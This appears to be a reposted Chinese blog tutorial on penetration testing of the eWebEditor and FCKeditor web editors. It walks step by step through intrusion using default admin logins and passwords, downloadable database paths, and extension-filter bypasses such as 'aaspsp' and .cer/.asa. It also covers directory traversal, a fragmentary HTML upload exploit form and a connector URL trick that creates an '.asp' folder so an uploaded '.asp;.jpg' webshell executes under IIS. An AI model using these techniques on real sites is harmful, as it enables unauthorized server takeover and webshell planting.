html编辑器渗透,渗透测试之编辑器漏洞与旁注、跨目录、跨库、CDN绕过
常用的編輯器
常見的編輯器有Ewebeditor? fckeditor? CKeditor kindeditor
1.Ewebeditor
測試環(huán)境用的是eWebEditor_v216_Free版本? 可以自己去網(wǎng)上下載對應(yīng)的版本搭建本地環(huán)境
利用核心
默認(rèn)后臺:www.xxxx.com/ewebeditor/admin_login.asp
默認(rèn)數(shù)據(jù)庫:ewebeditor/db/ewebeditor.mdb
默認(rèn)賬號密碼:admin admin/admin888
利用過程
常用入侵Ewebeditor 編輯器的步驟如下
1.首先訪問默認(rèn)管理頁面看是否存在
默認(rèn)管理頁地址2.80以前為?ewebeditor/admin_login.asp?以后版本為admin/login.asp(其他語言改后戳,這里以asp為例) 。
2.默認(rèn)管理員賬戶密碼
如果默認(rèn)管理頁面存在? 就用默認(rèn)賬戶密碼登錄? 默認(rèn)賬戶密碼為? admin? ?admin888??常用的密碼還有admin admin999 admin1 admin000?之類的。? 可以爆破一下
3.默認(rèn)數(shù)據(jù)庫地址
如果密碼不是默認(rèn)的? 就去嘗試下載默認(rèn)的數(shù)據(jù)庫
默認(rèn)數(shù)據(jù)庫路徑為:ewebeditor/db/ewebeditor.mdb?常用數(shù)據(jù)庫路徑為:ewebeditor/db/ewebeditor.asa
ewebeditor/db/ewebeditor.asp
ewebeditor/db/#ewebeditor.asa
ewebeditor/db/#ewebeditor.mdb
ewebeditor/db/ewebeditor.mdb
ewebeditor/db/!@#ewebeditor.asp
ewebeditor/db/ewebeditor1033.mdb?等等。
很多管理員經(jīng)常把數(shù)據(jù)庫的后綴改成 asp asa? 可以直接用迅雷下載下來
如果默認(rèn)賬戶密碼正確 登錄到后臺以后
在圖片類型這里加入asa|cer|asp|aaspsp這些后綴名
如果asp被過濾掉? 可以用aaspsp后綴來繞過?如果遇到一個管理員有安全意識的,從代碼里,把.asp .asa .cer .cdx 都完全禁止了,我們也可以用.asasaa 后綴來突破。
asa cer后綴在IIS6.0平臺解析為asp執(zhí)行
Aaspsp:繞過過濾過濾asp aaspsp=》asp
找到剛剛添加的樣式 點(diǎn)擊工具欄 開始添加按鈕
先新增一個工具欄? 再點(diǎn)按鈕設(shè)置
找到插入或修改圖片 點(diǎn)右箭頭 添加到已選按鈕框內(nèi)? 點(diǎn)擊保存設(shè)置? ?換一個低版本的IE瀏覽器? ?訪問編輯器就可以上傳圖片了? ?低版本的編輯器是不支持高版本的瀏覽器的
再返回樣式管理? ?找到剛才設(shè)置的那個樣式? 點(diǎn)擊預(yù)覽? 這里就要使用低版本的IE 否則是加載不出來按鈕的
高版本瀏覽器
上圖就是高版本瀏覽器訪問低版本編輯器 就是這樣? 啥也點(diǎn)不了
低版本IE
上圖就是低版本的IE? 可以插入內(nèi)容 點(diǎn)擊上傳圖片按鈕等等
多版本IE集成瀏覽器??IETester
這邊已經(jīng)設(shè)置好可以上傳cerasp等后綴文件
直接上傳一個asp的馬就可以
上傳好之后點(diǎn)代碼? 這塊千萬不要點(diǎn)查看源文件 查看源文件啥也查看不到
直接訪問上傳的webshell地址
2.目錄遍歷
第一步點(diǎn)上傳文件管理? ?隨便選擇一個樣式目錄
在id=xx后面加上&dir=../
直接可以遍歷目錄? 下載文件
由于目錄遍歷漏洞存在2.8.0? 我這個版本較低? 沒有? 就不演示了
3.尋找前人入侵痕跡
如何判斷有前人入侵過了??下載好數(shù)據(jù)庫之后查看他的eWebEditor_style表中的S_ImageExt字段是否有被人添加過什么。
使用下面的語句進(jìn)入突破:
ewebeditor.asp?ID=xx&style=yy
其中的id=xx就是被修改過的那條記錄的id,而yy就是S_name字段的名字。
例如這里就修改成: ewebeditor.asp?ID=54&style=testckse 去訪問圖片控件就出來了。。
4.文件上傳漏洞
ewebeditor asp版 2.1.6 上傳漏洞利用程序----
name=myform enctype="multipart/form-data">
type=file name=uploadfile size=100>
type=submit value=Fuck>
保存上面代碼到HTML? 直接上傳cer格式木馬
正常是這個頁面? ?但是沒有上傳按鈕? ?自己寫一個上傳按鈕
上傳成功之后會跳到上面黑黑的頁面
右鍵查看源代碼在最下面會看到上傳上去的文件名稱
完結(jié)....................
FCKeditor編輯器漏洞利用
先訪問這個頁面查看編輯器版本/_whatsnew.html
常用上傳地址FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
由于這里用的是2.5的版本所以下面這條語句能用http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
先試試解析漏洞 上傳一個a.asp;.png試一下
前面的.被過濾掉了
再試試二次上傳
第一次上傳:qq.asp;.jpg ==》qq_asp;.jpg
第二次上傳:qq.asp;.jpg ==》qq_asp;.jpg (不滿足命名要求)
可能出現(xiàn)第二次命名為qq.asp;.(1).jpg
還是不行
創(chuàng)建文件夾也沒用
執(zhí)行以下地址就能成功創(chuàng)建文件夾/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=xx.asp
這又是為什么了????手動不能創(chuàng)建,而通過以上地址就能成功創(chuàng)建了,讓我們來對比下,手動創(chuàng)建和通過以上地址創(chuàng)建的一個區(qū)別。
漏洞地址:
/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=x.asp
手工新建:
/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp
原因:
CurrentFolder:當(dāng)前文件夾?未進(jìn)行過濾(這個文件夾下的沒有過濾)
NewFolderName:新建文件名?進(jìn)行了過濾
這就是為什么通過上面地址能創(chuàng)建,而手動卻不能創(chuàng)建的一個原因,然后我們再上傳6.asp;.jpg到fendo.asp文件下看是否成功解析。
隨便上傳個一句話
然后對照服務(wù)器那邊拼接上傳路徑
總結(jié)
以上是生活随笔為你收集整理的html编辑器渗透,渗透测试之编辑器漏洞与旁注、跨目录、跨库、CDN绕过的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 如何知道股票里面有庄
- 下一篇: 2021年度训练联盟热身训练赛第八场 自